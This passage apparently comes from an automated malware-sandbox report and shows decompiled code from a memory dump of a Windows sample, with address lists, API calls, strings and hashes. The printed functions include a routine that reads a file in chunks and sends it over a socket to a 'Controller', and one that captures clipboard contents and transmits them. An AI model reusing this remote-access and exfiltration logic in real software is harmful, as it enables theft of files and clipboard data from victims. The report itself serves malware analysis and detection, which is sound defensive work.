                                    0x007176c8
                                    0x00717749
                                    0x0071774d
                                    0x0071774d
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                    • String ID:
                                    • API String ID: 2719235668-0
                                    • Opcode ID: adfa6531b562be6c1d5f687c9353e1eb62dc52e48079984561ca54131180f140
                                    • Instruction ID: cb1b02d70ce6f09a720114a15a140e731824b2d692094787f355539e94d26fc2
                                    • Opcode Fuzzy Hash: adfa6531b562be6c1d5f687c9353e1eb62dc52e48079984561ca54131180f140
                                    • Instruction Fuzzy Hash: B1D12772908304EFDB29AF7C9885AEEB7B4AF01320F54416DEA45972C2E73D9984C794
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D64A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E006D64A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E006D498B(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E006D4A08(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E006D427F(0,  &_v112, _a4);
					_t119 = E006E733B( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E006D75C2(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E006D2084(0, _t304, "[Info]");
					E006E6C80(0, _t297);
					_t305 = _t304 + 0x30;
					E006D1FC7();
					E006D1EF0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E00720880(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						E006D4E0B(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E006FF4C6(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E006D2084(0, _t216);
											E006D2084(0, _t306 - 0x18, "[ERROR]");
											E006E6C80(0, _t297);
											E006FF4CF(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E006FF4CF(_v12);
												CloseHandle(_t297);
												E006D4E0B(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E006D427F(0,  &_v112, _a4);
												_t154 = E006D20AB(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E006E7260(0x73c238,  &_v448, _v88, _v84);
												_t157 = E006E7260(0x73c238,  &_v424, _v36, _v40);
												E006D2F1D(_t305, E006D2F93(0x73c238,  &_v136, E006D2F93(0x73c238,  &_v160, E006D2F93(0x73c238,  &_v184, E006D2F1D( &_v208, E006D2F93(0x73c238,  &_v232, E006D2F1D( &_v256, E006D2F93(0x73c238,  &_v280, E006D2F93(0x73c238,  &_v304, E006D2F93(0x73c238,  &_v328, E006D2F93(0x73c238,  &_v352, E006D2F93(0x73c238,  &_v376, E006E739C(0x73c238,  &_v400,  &_v112), __eflags, 0x73c238), __eflags,  &_a8), __eflags, 0x73c238), __eflags,  &_a32), __eflags, 0x73c238), _t157), __eflags, 0x73c238), _t156), __eflags, 0x73c238), __eflags,  &_a56), __eflags, 0x73c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E006D4AA4(0x73c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1FC7();
												E006D1EF0();
												__eflags = 0x73c200 | _t173 == 0xffffffff;
												if((0x73c200 | _t173 == 0xffffffff) != 0) {
													E006D4E0B(_t299);
													CloseHandle(_t297);
													E006FF4CF(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E006FF4CF(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E006D20EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E006D4AA4(0, 0x73c2e8, _t278, _t310);
					L24:
					E006D4E0B(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				E006D1FC7();
				E006D1FC7();
				E006D1FC7();
				return _t198;
			}






























































                                    0x006d64a2
                                    0x006d64ae
                                    0x006d64b1
                                    0x006d64b6
                                    0x006d64c0
                                    0x006d64c1
                                    0x006d64c2
                                    0x006d64c3
                                    0x006d64c4
                                    0x006d64c9
                                    0x006d64d0
                                    0x006d64ea
                                    0x006d64f3
                                    0x006d64f5
                                    0x006d64f8
                                    0x006d651c
                                    0x006d6521
                                    0x006d6524
                                    0x006d652a
                                    0x006d652d
                                    0x006d6533
                                    0x006d6536
                                    0x006d653c
                                    0x006d653f
                                    0x006d6542
                                    0x006d6550
                                    0x006d6555
                                    0x006d6558
                                    0x006d6560
                                    0x006d6565
                                    0x006d656f
                                    0x006d6574
                                    0x006d6579
                                    0x006d6582
                                    0x006d658a
                                    0x006d6595
                                    0x006d65a0
                                    0x006d65a6
                                    0x006d65ae
                                    0x006d65b0
                                    0x006d65b3
                                    0x006d65b6
                                    0x006d65b8
                                    0x006d65bd
                                    0x006d65c0
                                    0x006d65c3
                                    0x006d6864
                                    0x006d6865
                                    0x006d686d
                                    0x006d6872
                                    0x006d65c9
                                    0x006d65c9
                                    0x006d65d4
                                    0x006d65d7
                                    0x006d65dd
                                    0x006d65e0
                                    0x006d65e0
                                    0x006d65e5
                                    0x006d65e5
                                    0x006d65e5
                                    0x006d65e5
                                    0x006d65e8
                                    0x006d65eb
                                    0x006d65ed
                                    0x006d65f0
                                    0x006d65f6
                                    0x006d65f6
                                    0x006d65f8
                                    0x006d65fb
                                    0x006d65f2
                                    0x006d65f2
                                    0x006d65f4
                                    0x00000000
                                    0x00000000
                                    0x006d65f4
                                    0x006d65f0
                                    0x006d65fe
                                    0x006d65ff
                                    0x006d6605
                                    0x006d660a
                                    0x006d6610
                                    0x006d6614
                                    0x006d661a
                                    0x006d661c
                                    0x006d68da
                                    0x006d68dd
                                    0x006d68df
                                    0x00000000
                                    0x006d6622
                                    0x006d662f
                                    0x006d6635
                                    0x006d6637
                                    0x006d68ce
                                    0x006d68d1
                                    0x006d68d3
                                    0x006d68e4
                                    0x006d68e4
                                    0x006d68f3
                                    0x006d68f8
                                    0x006d6900
                                    0x006d6909
                                    0x00000000
                                    0x006d663d
                                    0x006d663d
                                    0x006d6641
                                    0x006d68b5
                                    0x006d68bc
                                    0x006d68c4
                                    0x006d68cb
                                    0x00000000
                                    0x006d6647
                                    0x006d664d
                                    0x006d665e
                                    0x006d6663
                                    0x006d6680
                                    0x006d6695
                                    0x006d6754
                                    0x006d6759
                                    0x006d675d
                                    0x006d6761
                                    0x006d6766
                                    0x006d6772
                                    0x006d677d
                                    0x006d6788
                                    0x006d6793
                                    0x006d679e
                                    0x006d67a9
                                    0x006d67b4
                                    0x006d67bf
                                    0x006d67ca
                                    0x006d67d5
                                    0x006d67e0
                                    0x006d67eb
                                    0x006d67f6
                                    0x006d6801
                                    0x006d680c
                                    0x006d6814
                                    0x006d6819
                                    0x006d681b
                                    0x006d6899
                                    0x006d689f
                                    0x006d68a8
                                    0x006d68ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006d681b
                                    0x006d6641
                                    0x006d6637
                                    0x00000000
                                    0x006d681d
                                    0x006d6820
                                    0x006d6825
                                    0x006d6828
                                    0x006d682b
                                    0x006d6832
                                    0x006d6835
                                    0x006d6839
                                    0x006d6841
                                    0x006d6842
                                    0x006d6845
                                    0x006d6847
                                    0x006d684a
                                    0x006d684d
                                    0x006d6850
                                    0x006d6850
                                    0x006d6859
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006d685b
                                    0x006d685b
                                    0x006d685b
                                    0x00000000
                                    0x006d65cb
                                    0x006d65cb
                                    0x006d65ce
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x006d65ce
                                    0x006d65c9
                                    0x006d64fa
                                    0x006d6503
                                    0x006d6508
                                    0x006d650f
                                    0x006d690f
                                    0x006d6911
                                    0x006d6916
                                    0x006d6918
                                    0x006d6918
                                    0x006d6918
                                    0x006d6874
                                    0x006d6877
                                    0x006d687f
                                    0x006d6887
                                    0x006d6894

                                    APIs
                                      • Part of subcall function 006D4A08: connect.WS2_32(?,0073DBA0,00000010), ref: 006D4A23
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 006D64ED
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 006D6524
                                    • __aulldiv.LIBCMT ref: 006D65A6
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 006D6614
                                    • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 006D662F
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                      • Part of subcall function 006D4E0B: closesocket.WS2_32(?), ref: 006D4E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                                    • API String ID: 1319223106-2190262076
                                    • Opcode ID: 2b68c66d0d134674f0cba69eba341e7c307b5ce2261552a9781c7c7e70663fb9
                                    • Instruction ID: d53ac5c0111a926e147d39159ced19ccef331593760e74661c233d66b4d3796e
                                    • Opcode Fuzzy Hash: 2b68c66d0d134674f0cba69eba341e7c307b5ce2261552a9781c7c7e70663fb9
                                    • Instruction Fuzzy Hash: CBC18B31D00219AFCB54EFA4DC929EEB7B6AF15310F10816EF415AA391EF345E45CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E2CEE, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83clipboardmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E006E2CEE(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					E006D1E49( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E006D2489() + 2);
					_t20 = GlobalLock(_t57);
					E006D1E49( &_a12, _t55, _t68, _t38);
					_t22 = E006D2489();
					E007024E0(_t20, E006D1F95(E006D1E49( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x72f724;
						E006D427F(_t38,  &_a36,  !=  ? _t31 : 0x72f724);
						_t55 =  &_a32;
						E006E739C(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						E006D4AA4(_t38, 0x73c780,  &_a32, _t31);
						E006D1EF0();
					}
				}
				_t7 =  &_a16; // 0x6d4538
				E006D1E74(_t7, _t55);
				E006D1FC7();
				E006D1FC7();
				return 0;
			}













                                    0x006e2cee
                                    0x006e2cef
                                    0x006e2cf5
                                    0x006e2cf7
                                    0x006e2cfd
                                    0x006e2d08
                                    0x006e2d23
                                    0x006e2d26
                                    0x006e2d33
                                    0x006e2d3a
                                    0x006e2d53
                                    0x006e2d58
                                    0x006e2d5c
                                    0x006e2d65
                                    0x006e2d82
                                    0x006e2d91
                                    0x006e2d9f
                                    0x006e2da2
                                    0x006e2dab
                                    0x006e2db1
                                    0x006e2dbe
                                    0x006e2dc6
                                    0x006e2dce
                                    0x006e2dd4
                                    0x006e2dd9
                                    0x006e2de0
                                    0x006e318d
                                    0x006e318d
                                    0x006e2d91
                                    0x006e33c4
                                    0x006e33c8
                                    0x006e33d4
                                    0x006e33e0
                                    0x006e33ed

                                    APIs
                                    • OpenClipboard.USER32 ref: 006E2CEF
                                    • EmptyClipboard.USER32 ref: 006E2CFD
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 006E2D1D
                                    • GlobalLock.KERNEL32 ref: 006E2D26
                                    • GlobalUnlock.KERNEL32(00000000), ref: 006E2D5C
                                    • SetClipboardData.USER32 ref: 006E2D65
                                    • CloseClipboard.USER32 ref: 006E2D82
                                    • OpenClipboard.USER32 ref: 006E2D89
                                    • GetClipboardData.USER32 ref: 006E2D99
                                    • GlobalLock.KERNEL32 ref: 006E2DA2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 006E2DAB
                                    • CloseClipboard.USER32 ref: 006E2DB1
                                      • Part of subcall function 006D4AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 006D4B18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: 8Em
                                    • API String ID: 3520204547-1798622111
                                    • Opcode ID: 465bf9d25217cccf9bff0dda1492fbcc6c96c80dc1cb6bf2ab265b4f4b71a26e
                                    • Instruction ID: 26629066750a10fd6b3ad2fde38cdc676442f225516d1eb2bd33153cdae62a0e
                                    • Opcode Fuzzy Hash: 465bf9d25217cccf9bff0dda1492fbcc6c96c80dc1cb6bf2ab265b4f4b71a26e
                                    • Instruction Fuzzy Hash: 00219A31904340ABD354BB71DC5E9BE77AAAF95701F00441EF902DA392DF7C8F058669
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E8E5A, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E006E8E5A(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x73beb8 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x73bec0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x73bebc) == 0) {
							ShowWindow( *0x73bebc, 9);
							SetForegroundWindow( *0x73bebc);
						} else {
							ShowWindow( *0x73bebc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x73beb8, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}








                                    0x006e8e62
                                    0x006e8e65
                                    0x006e8f36
                                    0x006e8f43
                                    0x006e8f4b
                                    0x006e8f51
                                    0x00000000
                                    0x006e8f51
                                    0x006e8e6b
                                    0x006e8e70
                                    0x006e8f1f
                                    0x00000000
                                    0x00000000
                                    0x006e8f28
                                    0x006e8f30
                                    0x006e8f30
                                    0x006e8e7b
                                    0x006e8e8b
                                    0x006e8e90
                                    0x006e8eed
                                    0x006e8f07
                                    0x006e8f13
                                    0x006e8eef
                                    0x006e8ef7
                                    0x006e8ef7
                                    0x00000000
                                    0x006e8eed
                                    0x006e8e95
                                    0x006e8eb4
                                    0x006e8ebd
                                    0x006e8ed7
                                    0x00000000
                                    0x006e8ed7
                                    0x006e8e97
                                    0x006e8e9a
                                    0x006e8e9d
                                    0x006e8ea2
                                    0x00000000
                                    0x006e8ea5
                                    0x006e8e7d
                                    0x006e8e80
                                    0x006e8e83
                                    0x00000000

                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 006E8EA5
                                    • GetCursorPos.USER32(?), ref: 006E8EB4
                                    • SetForegroundWindow.USER32(?), ref: 006E8EBD
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 006E8ED7
                                    • Shell_NotifyIconA.SHELL32(00000002,0073BEC0), ref: 006E8F28
                                    • ExitProcess.KERNEL32 ref: 006E8F30
                                    • CreatePopupMenu.USER32 ref: 006E8F36
                                    • AppendMenuA.USER32 ref: 006E8F4B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: 955f3381277898c4c09b689098286033c7449ebe508ddbc88486d1571510331e
                                    • Instruction ID: 58455f39e35f348fcd926fb664c9d959d5ebbe86de61770d9fe09a72d3158116
                                    • Opcode Fuzzy Hash: 955f3381277898c4c09b689098286033c7449ebe508ddbc88486d1571510331e
                                    • Instruction Fuzzy Hash: D8213D31144249FFEF258FA5EC0DAAA3B77FB04302F008518F60995171CFB99E519B18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070F5AB, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 91%
                                    			E0070F5AB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x73a00c; // 0x941617c6
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x7277b8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x727a38;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x727bb8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E006FFD1B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E0070F348(_t172, 1, 4);
					E007101F5(_t170);
					_v32 = E0070F348(_t172, 0x180, 2);
					E007101F5(_t170);
					_v36 = E0070F348(_t172, 0x180, 1);
					E007101F5(_t170);
					_v40 = E0070F348(_t172, 0x180, 1);
					E007101F5(_t170);
					_t197 = E0070F348(_t172, 0x101, 1);
					_v52 = _t197;
					E007101F5(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E007101F5(_v44);
						E007101F5(_v32);
						E007101F5(_v36);
						E007101F5(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E0071480C(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E0071480C(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E007193AC(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E007101F5( *(_t215 + 0x90) - 0xfe);
										E007101F5( *(_t215 + 0x94) - 0x80);
										E007101F5( *(_t215 + 0x98) - 0x80);
										E007101F5( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E007101F5(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0071B0F4(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                                    0x0070f5b3
                                    0x0070f5ba
                                    0x0070f5bf
                                    0x0070f5c2
                                    0x0070f5c5
                                    0x0070f5c8
                                    0x0070f5cb
                                    0x0070f5d1
                                    0x0070f5d4
                                    0x0070f5d7
                                    0x0070f5da
                                    0x0070f5dd
                                    0x0070f5e2
                                    0x0070f902
                                    0x0070f904
                                    0x0070f906
                                    0x0070f906
                                    0x0070f909
                                    0x0070f90f
                                    0x0070f911
                                    0x0070f917
                                    0x0070f91d
                                    0x0070f927
                                    0x0070f931
                                    0x0070f938
                                    0x0070f948
                                    0x0070f948
                                    0x0070f5e8
